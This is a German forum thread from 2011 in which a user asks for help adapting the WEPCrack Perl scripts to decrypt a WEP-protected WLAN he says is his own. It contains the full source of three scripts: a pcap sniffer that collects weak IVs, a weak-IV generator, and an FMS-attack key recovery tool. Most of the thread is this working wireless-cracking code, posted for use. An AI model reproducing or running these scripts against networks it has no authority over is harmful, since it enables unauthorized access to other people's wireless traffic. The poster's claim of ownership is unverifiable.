"WEPCrack" - Skripte anpassen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von N.W.O., 7. September 2011 .

Schlagworte:
  1. 7. September 2011
    Hallo Leute,

    ich habe mir nun WEPCrack geladen und bin einfach zu blöd dies zu verwenden.
    Active Pearl ist auf Vista installiert und scheint auch zu funktionieren, allerdings fehlt mir das nötige Hintergrundwissen um die 3 Pearl Skripte anzupassen.
    Im Internet finde ich leider auch nicht wirklich was dazu.
    Ich möchte damit mein WEP geschütztes WLAN entschlüsseln, soll ja bei WEP spielend leicht sein...
    WEPCrack erscheint mir simpler als beispielsweise Backtrack, daher wollt ich es zunächst damit versuchen!

    Würde sich jemand von euch kurz Zeit nehmen und eben kurz über die Skripte schauen und so verändern, dass ich damit was anfangen kann?
    Denn ich habe bisher mit dem Metier so rein gar nichts zu tun gehabt und weiß nicht wo ich da ansetzen soll.
    Für euch ist das sicher eine sache von 5 Minuten, wenn überhaupt

    Hier die 3 Dateien:


    pcap-getIV
    Spoiler
    Code:
    #!/usr/bin/perl
    #
    # pcap-getIV.pl 
    # Anton T. Rager 10/05/2004
    #
    # script to open pcapfile/device and watch for weak IVs. 
    # Creates file "IVFile.log" with captured/processed IVs 
    # that match weak criteria. This script replaces the 3+
    # yr old prism-getIV.pl script that relied on prismdump 
    # and a braindamaged way of processing the prismdump captures.
    #
    # Use WEPCrack.pl to crack key after collecting 60+ Weak IVs 
    # for each keybyte in secret.
    #
    # Features:
    # - auto detects prism2 DLTs and skips prism2 header info
    # - 10000 packet status messages with timestamp for progress indication
    # - works with interface configured for monitor_mode and libpcap.
    # - also works with saved pcap files or saved prismdump files.
    #
    # Limitations: 
    # - assumes all traffic is for same BSSID/WEP encrypted network (try filtering if otherwise)
    # - does not discard repeated IVs from multiple/same nodes (again - try filtering on source MAC to prevent)
    # - static setting for 40bit WEP
    
    
    use Net::Pcap;
    use Term::ReadKey;
    
    # Non Buffered Output
    $|=1;
    
    # -------------------------- Begin Options ---------------------------------------
    
    # Static setting for WEP keysize with this capture
    #
    $bytesize = 5; # 5 for 40bit 13 for 104bit WEP
    
    # Debug output - print all observed IVs - not just weak ones
    #
    $debug=0;
    
    # Append to existing logfile
    #
    $append_log=1;
    
    # number of packets to automatically dump status
    #
    $statdump=10000;
    
    # threshold for weak IVs and WEPCrack launch - launch manual with "c" command
    #
    $crack_threshold=60;
    
    # Toggles for differing Weak IVs
    # "Magic" IVs follow (x, 255, y) format (from FMS paper) - most reliable 
    # for cracking, but requires lots of WEP frames
    # Resolved IVs match basic resolved equations (from FMS paper) - less reliable
    # for cracking, but occur often
    # Dwepcrack IVs match h1kari's 2nd output byte weak IVs 
    # (future option - see h1kari's paper)
    # 
    $magic_iv=1;
    $resolved_iv=0;
    
    
    # Enter a single MAC address (bssid or source address) to limit IV collection 
    # to specific network or host. With no filter, all frames are evaluated/recorded
    # 
    #$filter="000102030405"; # bssid or specific source MAC
    
    
    
    # -------------------------- Options End Here ------------------------------------
    
    # Grab and process ARGS
    
    $argflag=0;
    if (substr(@ARGV[0],0,1) eq "-") {
     $argflag=1;
    } else {
     print("Error: must supply options\n");
     &usage;
    }
    # -f file
    # -i int
    # -b bytesize
    # -w weak IV types (magic/resolved)
    # -F filter
    # -n new logfile
    
    while ($argflag eq 1) {
     if (@ARGV[0] eq "-f") { # pcap file
     $file=@ARGV[1];
     shift(@ARGV); # remove option
     shift(@ARGV); # remove value
     } elsif (@ARGV[0] eq "-i") { # pcap interface
     $dev=@ARGV[1];
     shift(@ARGV); # remove option
     shift(@ARGV); # remove value
     } elsif (@ARGV[0] eq "-F") { # MAC to include filter
     $filter=@ARGV[1];
     shift(@ARGV); # remove option
     shift(@ARGV); # remove value
     } elsif (@ARGV[0] eq "-b") { # WEP Bytesize
     if (int(@ARGV[1])) {
     $bytesize=@ARGV[1];
     } else {
     print("bytesize is not an integer, reverting to bytesize of $bytesize\n");
     }
     shift(@ARGV); # remove option
     shift(@ARGV); # remove value
     } elsif (@ARGV[0] eq "-w") { # IV detection types - list with , as delimit
     $magic_iv=0;
     $resolved_iv=0;
     @IV_options=split("\,",@ARGV[1]);
     foreach $IV_list (@IV_options) {
     if ($IV_list eq "magic") {
     $magic_iv=1;
     } elsif ($IV_list eq "resolved") {
     $resolved_iv=1;
     } else {
     print("Invalid IV type $IV_List\n");
     }
     }
     if (!$magic_iv && !$resolved_iv) {
     $magic_iv=1;
     }
     shift(@ARGV); # remove option
     shift(@ARGV); # remove value
     } elsif (@ARGV[0] eq "-n") { # create new logfile
     $append_log=0;
     shift(@ARGV); # remove option
     } elsif (@ARGV[0] eq "-h") { # usage
     &usage;
     }
    
     
    $argflag=0;
    if (substr(@ARGV[0],0,1) eq "-") {
     $argflag=1;
    }
    
     
    }
    
    #if (!$ARGV[0]) {
    # die("Usage: pcap device -- or pcap -f filename\n");
    #} elsif ($ARGV[0] eq "-f") {
    # $file=@ARGV[1];
    #} else {
    # $dev=@ARGV[0];
    #}
     
    
    
    # Graceful exit with flush on <ctrl>C
    $SIG{INT} = \&sigint_handler;
    
    if ($file) {
     $object=Net::Pcap::open_offline($file,\$err);
     print("Opening pcap file $file.....\n");
    
     if (!$object) {
     die("Pcap Open Failed for file $file\n");
     }
    } else {
     $object=Net::Pcap::open_live($dev,1510, 0, -1, \$err);
     print("Opening device $dev.....\n");
    
     if (!$object) {
     die("Pcap Open Failed for device $dev\n");
     }
    
    }
    
    
    
    $dlt=Net::Pcap::datalink($object);
    print("DLT = $dlt: ");
    
    if ($dlt eq 105) {
     print("DLT_IEEE802_11 (0byte Offset)\n");
     $offset=0;
    } elsif ($dlt eq 119) {
     print("Prism2 Header (144byte Offset)\n");
     $offset=144;
    } else {
     die("unsupported DLT type");
    }
    
    print("Assuming WEP key is $bytesize bytes (",$bytesize*8,"bits) long \n");
    print("\tthis determines how may keybytes deep to collect weak IVs\n");
    print("\tchange bytesize var or IVFile.log header if otherwise\n");
    print("\n");
    print("Status update at $statdump packets\n");
    
    if ($append_log && -f "IVFile.log") {
     # open for append and assume header is same bitsize
     print("Appending to existing logfile IVFile.log\n");
     open(IVFile, ">>IVFile.log");
     # todo: read existing file and update WeakIV counters
    } else {
     # open logfile and create header
     print("Creating new logfile IVFile.log\n");
     open(IVFile, ">IVFile.log");
     # Temp static header for 40/104 WEP - 
     # need to change cracker to try both?
     print(IVFile "$bytesize\n");
    }
    # populate keycounter array with zero values
    for ($x=0;$x<$bytesize;$x++) {
     $keycounter[$x]=0;
    }
    
    if ($filter) {
     print("Filtering on source MAC or BSSID of $filter\n");
    } else {
     print("No filters - evaluating all detected frames for weak IVs\n\t(mult APs will prob confuse cracker)\n");
    }
    print("IV Flags: Magic=$magic_iv, Resolved=$resolved_iv\n");
    
    $help = <<EOF;
    Interactive Commands:
    \th: Flash help
    \tf: Flush data to file
    \tn: Create new IVFile.log file
    \ts: Flash status summary
    \td: Toggle debug packet printing (1=All IVs/0=Only Weak IVs)
    \tc: Launch WEPCrack process on collected data
    \t^c: Exit
    EOF
    
    print("Press \'h\' for interactive command help\n");
    
    $start_time=time();
    
    Net::Pcap::loop($object, -1, \&process_packet, $user_data);
    
    print("Exiting and flushing files\n");
    
    sub sigint_handler {
     # snipped from jwright
     if ($object) {
     Net::Pcap::close ($object);
     close(IVFile);
     print("Flushed open files\n");
     exit(0);
     }
    }
    
    sub process_packet {
     my ($user_data, $header, $pkt) = @_;
     my($frame_type);
     my ($source_mac);
     my ($dest_mac);
     my ($bssid);
     my ($flags);
     my ($addr_1);
     my ($addr_2);
     my ($addr_3);
     my ($iv_field);
     my ($llc_head);
     my ($onebyte);
     my (@IVList);
     my ($y);
     my ($x);
     #print("packet len ", $header->{caplen}," : ");
     
     $frame_type = ord(substr($pkt, $offset,1));
     
     if ($frame_type == 0x80) { 
     # print packets if verbose flag
     #print("Beacon\n");
     } elsif ($frame_type == 0x08) { 
     $flags=ord(substr($pkt, $offset+1,1)); # extract dec value
     $addr_1=unpack('H*', substr($pkt,$offset+4,6)); # extract hex values
     $addr_2=unpack('H*', substr($pkt,$offset+10,6));# extract hex values
     $addr_3=unpack('H*', substr($pkt,$offset+16,6));# extract hex values
     $llc_head=unpack('H*',substr($pkt,$offset+24,5)); # either WEP IVs or LLC
     
     #print("Data\n");
     
     if (($flags & 0x01) == 0x01) { # to DS
     $bssid=$addr_1;
     $source_mac=$addr_2;
     $dest_mac=$addr_3;
     } elsif (($flags & 0x02) == 0x02) {
     $bssid=$addr_2;
     $source_mac=$addr_3;
     $dest_mac=$addr_1;
     } 
     
     if ($bssid eq $filter || $source_mac eq $filter || !$filter) {
     
     if (($flags & 0x40) == 0x40) { # WEP
     $iv_field=$llc_head;
     $y=0;
     for ($x=0; $x<4; $x++) {
     push(@IVList,substr($iv_field,$y, 2));
     $y=$y+2;
     }
     $onebyte=substr($iv_field,$y,2);
     
     splice(@IVHist,0,1);
     push(@IVHist,hex(substr($iv_field,0, 6)));
     
     $wep_progress_counter++;
     $timestamp=time();
     if ($wep_progress_counter == $statdump) {
     $total_frames = $total_frames + $wep_progress_counter;
     $pkt_ave=int($total_frames/($timestamp-$start_time));
     if ($save_time && $timestamp-$save_time > 0) {
     $int_ave=int($statdump/($timestamp-$save_time));
     } else {
     $int_ave=$pkt_ave;
     }
    
     print("Timestamp=$timestamp : $total_frames WEP frames seen (tot=$pkt_ave fps, last=$int_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
     for ($x=0;$x<$bytesize;$x++) {
     print(" $x=$keycounter[$x]");
     }
     print("\n");
     $wep_progress_counter=0;
     $save_time=$timestamp;
     }
     
     if ($debug) {
     print("WEP: bssid=$bssid, src=$source_mac IV $IVList[0]:$IVList[1]:$IVList[2] $IVList[3] - $onebyte\n");
     }
    
     # -- [0] >2 < 16, [1] = 255 (Magic)
     # -- [0]+[1] =1 and [3] <=0x0a or [3] ==0xff (Low Generics?)
     # -- [0]+[1] <=0x0c and [3] >=0xf2 and [3] <=0xfe and and [3] !=0xfd (High Generics)
     
     
     
     if ($magic_iv && hex($IVList[0]) > 2 && (hex($IVList[0])-3) < $bytesize && hex($IVList[1]) eq 255) { 
     $keybyte=(hex($IVList[0])-3); 
     print("write: Magic IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:",$keybyte ,") \n");
     print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte),"\n");
     $keycounter[$keybyte]++;
     } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256 eq 1 && (hex($IVList[2])+2) < $bytesize)) {
     $keybyte=(hex($IVList[2])+2);
     print("Low IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); 
     print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n");
     $keycounter[$keybyte]++;
     } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256) eq (254 - hex($IVList[2])) && (254 - hex($IVList[2])) < $bytesize) {
     $keybyte=(254 - hex($IVList[2]));
     print("High IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); 
     print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n");
     $keycounter[$keybyte]++;
     }
     #print("Bssid: $bssid\n");
     
     
     
     
     
     } else {
     # Check for IP LLC header -- if none, then may be lying firmware. Just note for now.
     if ($llc_head eq "aaaa030000" || $llc_head eq "aaaa190087" || $llc_head eq "aaaa31009c") {
     print("Cleartext\n")
     
     } else {
     print("No WEP flag, but fuzzycheck thinks WEP - you may weant to upgrade your prism firmware ($llc_head)\n");
     # 0xAA - IP LLC
     # 0x42 ?
     # 0xf0 - NetBios
     # 0xE0 - IPX
     
     # $llc_head eq "aaaa190087"
     # $llc_head eq "aaaa31009c"
     }
     }
    }
     
     } else {
    
     }
    
    
     ReadMode('cbreak');
     $key = ReadKey(.000001);
     ReadMode('normal');
     if ($key) {
    
     if ($key eq "h") {
     print("-$help");
     } elsif ($key eq "d") {
     $debug=$debug^1;
     print("-Debug = $debug\n");
     } elsif ($key eq "f") {
     select((select(IVFile), $| =1) [0]);
     print("-Flushed open files\n");
     } elsif ($key eq "n") {
     close(IVFile);
     # open logfile and create header
     print("Creating new logfile IVFile.log\n");
     open(IVFile, ">IVFile.log");
     # Temp static header for 40/104 WEP - 
     # need to change cracker to try both?
     print(IVFile "$bytesize\n");
     
     } elsif ($key eq "s") {
     $timestamp=time();
     
     $total_frames = $total_frames + $wep_progress_counter;
     $pkt_ave=int($total_frames/($timestamp-$start_time));
     print("-Stats: Timestamp=$timestamp : $total_frames WEP frames seen ($pkt_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
     for ($x=0;$x<$bytesize;$x++) {
     print(" $x=$keycounter[$x]");
     }
     print("\n");
     } elsif ($key eq "c" || $key eq "C") {
     $crack_warn=0;
     if ($key eq "c") {
     print("-Checking IV stats\n");
     for ($x=0;$x<$bytesize;$x++) {
     if ($keycounter[$x] < $crack_threshold) {
     $crack_warn=1;
     print("\tWe only have $keycounter[$x] weak IVs for Keybyte $x and threshold is $crack_threshold\n");
     }
     }
     }
     if ($crack_warn=0 || $key eq "C") { 
     Net::Pcap::close ($object); 
     select((select(IVFile), $| =1) [0]);
     print("-Flushed open files\n");
     print("--Calling ./WEPCrack.pl\n\n");
     exec("./WEPCrack.pl");
     } else {
     print("Try \"C\" if you really want to crack with too few weak IVs\n");
     }
     } 
     
     }
    }
    
    sub usage {
    
    die("pcap-getIV.pl [-i interface/-f pcapfile] (options)
    \t-f pcap filename
    \t-i pcap interface
    \t-w weak IV type list (\"magic\", \"resolved\" or \"magic,resolved\" for both)
    \t-F include source/BSSID filter (hex MAC - ie \"010203ffffff\")
    \t-b WEP Bytesize (defaults to 5 - 5=40bit, 13=104bit)
    \t-n create new logfile (default is append to existing)
    ");
    }

    WeakIVGen
    Spoiler
    Code:
    #!/usr/bin/perl
    
    # basic RC4 keyscheduler and PRGA routine that chooses IVs known to be weak (A+3, N-1, X) and encrypts one byte with key supplied from
    # command line. An output file is created in the current directory that contains IVs with a corresponding encrypted byte as well as an
    # indicator for secret key size
    #
    # Choice of the (A+3, N-1, X) keys is based on the paper "Weakness in the Key Scheduling Algorithm of RC4" by
    # Scott Fluhrer, Itsik Mantin, and Adi Shamir
    #
    
    # By : Anton T. Rager - 08/09/2001-08/12/2001
    # a_rager@yahoo.com
    
    $findhost=@ARGV[0];
    if (!$findhost) {
     print("Usage: WeakIVGen.pl <Key1:Key2:Key3:Key4:Key5...Keyn>\n\nWhere Keyx is key byte in decimal\nAnd : is delimiter for each byte [40bit=5bytes, 128bit=11bytes]\n");
     exit;
    }
    
    
    $i=0;
    $j=0;
    $ik=0;
    $x=0;
    
    @inkey=split(":", @ARGV[0]);
    
    @IV = (3, 255, 0);
    
    # 802.2 SNAP Header should be 1st plaintext byte of WEP packet
    @text = (0xaa);
    
    # Keysize 11 byte or 5 byte
    $keysize=scalar(@inkey);
    $bitsize=$keysize*8;
    
    print("Keysize = $keysize\[$bitsize bits\]\n");
    
    open(OUTFILE, ">IVFile.log");
    
    print("$keysize\n");
    print(OUTFILE "$keysize\n");
    
    $keylen = $keysize+3;
    
    for ($B=0; $B < $keysize; $B++) {
     #print("$B\n");
    
     
    
     for ($loop1=0; $loop1 < 256 ; $loop1++) {
     $IV[2]=$loop1;
     # for ($loop2=0; $loop2 < 10; $loop2++) {
     $IV[0]=$B+3;
     # $IV[0]=$loop2;
     for ($i=0; $i < $keylen; $i++) {
     if ($i < 3) {
     $Key[$i]=$IV[$i];
     } else {
     $Key[$i]=$inkey[$i-3];
     }
    
     }
    
    
     $i=0;
     $j=0;
     $ik=0;
    
     for ($i=0; $i<256; $i++) {
     $S[$i]=$i;
     if ($ik > $keylen-1) {
     $ik=0;
     }
     $Key[$i]=$Key[$ik];
     $ik++;
     }
    
     for ($i=0; $i<256; $i++) {
     $j=($j+$S[$i]+$Key[$i]) % 256;
     $temp = $S[$i];
     $S[$i] = $S[$j];
     $S[$j] = $temp;
     }
    
     # 1 byte thru PRGA
     $i=0;
     $j=0;
     $i=($i+1) % 256;
     $j=($j + $S[$i]) % 256;
     $temp=$S[$i];
     $S[$i]=$S[$j];
     $S[$j]=$temp;
     $t=($S[$i]+$S[$j]) % 256;
     $K=$S[$t];
     $encr=$text[0] ^ $K;
     $S3Calc = $text[0] ^ $encr;
     print("$IV[0] $IV[1] $IV[2] $encr\n");
     print(OUTFILE "$IV[0] $IV[1] $IV[2] $encr\n");
    
    
    
     }
    
    }
    print("\n");
    close(OUTFILE);

    WEPCrack
    Spoiler
    Code:
    #!/usr/bin/perl
    
    # Basic WEP/RC4 crack tool that demonstrates the key scheduling weaknesses 
    # described in the paper "Weakness in the Key Scheduling Algorithm of RC4" 
    # written by Scott Fluhrer, Itsik Mantin, and Adi Shamir.
    #
    # script relies on existance of file with list of IVs and 1st encrypted 
    # output byte to produce the secret key originally used to encrypt the 
    # list of IVs. Scripts WeakIVGen.pl and pcap-getIV.pl are included to
    # produce/capture weak IVs and produce the logfile this script expects.
    #
    # By : Anton T. Rager
    # a_rager@yahoo.com
    # 08/09/2001-08/12/2001 - initial code to demo FMS attack
    # 10/05/2004 - updated original 3yr old code to process generic resolved IVs
    
    $i=0;
    $j=0;
    $ik=0;
    $x=0;
    
    
    # 802.2 SNAP Header should be 1st plaintext byte of WEP packet
    @text = (0xaa);
    
    
    if (!-f "IVFile.log") {
     die("Error :\nNo IVFile.log file found - run WeakIVGen.pl or pcap-getIV.pl 1st to generate file\n");
    
    }
    # Keysize 11 byte or 5 byte
    open (IVFILE, "IVFile.log");
    @IVList=<IVFILE>;
    close (IVFILE);
    
    $keysize=$IVList[0]; 
    chomp($keysize);
    splice(@IVList, 0, 1);
    
    $bitsize=$keysize*8;
    print("Keysize = $keysize \[$bitsize bits\]\n");
    
    
    for ($B=0; $B < $keysize; $B++) {
    
     # Init statistics array
     for ($i=0; $i < 256; $i++) {
     $stat[$i]=0;
     }
    
     foreach $IVRec (@IVList) {
    
     @IV=split(" ",$IVRec);
     $key[0]=$IV[0];
     $key[1]=$IV[1];
     $key[2]=$IV[2];
     $encr=$IV[3];
    
    # if ($key[0] eq $B+3) {
    
    
    
    
    # Look for matching IV for 1st Key byte
    
     $i=0;
     $j=0;
     $ik=0;
    
     for ($i=0; $i<256; $i++) {
     $S[$i]=$i;
    
     }
    
     # 0 to 3+K[b]
     for ($i=0; $i< $B + 3; $i++) {
     $j=($j+$S[$i]+$key[$i]) % 256;
     $temp = $S[$i];
     $S[$i] = $S[$j];
     $S[$j] = $temp;
     if ($i eq 1) {
     $S1[0]=$S[0]; 
     $S1[1]=$S[1];
     }
     
     }
    
    
     $X=$S[1];
     if ($X < $B + 3) {
     if ($X+$S[$X] eq $B + 3) {
     if ($S[0] ne $S1[0] || $S[1] ne $S1[1]) {
     #print("Throwaway IV $IV[0], $IV[1], $IV[2]\n");
     }
    
    # Xor inbyte and outbyte to get S[3]
    # plugin S[3] as J and subtract (5+x+S[3]) to get K
     $S3Calc = $encr ^ $text[0];
     $leaker = $S3Calc-$j-$S[$i] %256;
     $stat[$leaker]++;
     }
     }
     
    
    
     $max=0;
     $count=0;
     foreach $rank (@stat) {
     if ($rank > $max) {
     $max=$rank;
     $winner=$count;
     }
     $count++;
     }
    #}
    }
    print("$winner ");
    push (@key, $winner);
    
    }
    print("\n");
    

    Ich bin auf eure Antworten gespannt!
     
  2. 8. September 2011
    AW: "WEPCrack" - Skripte anpassen

    solltest meinen text noch mal lesen, es geht hier um mein wlan
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.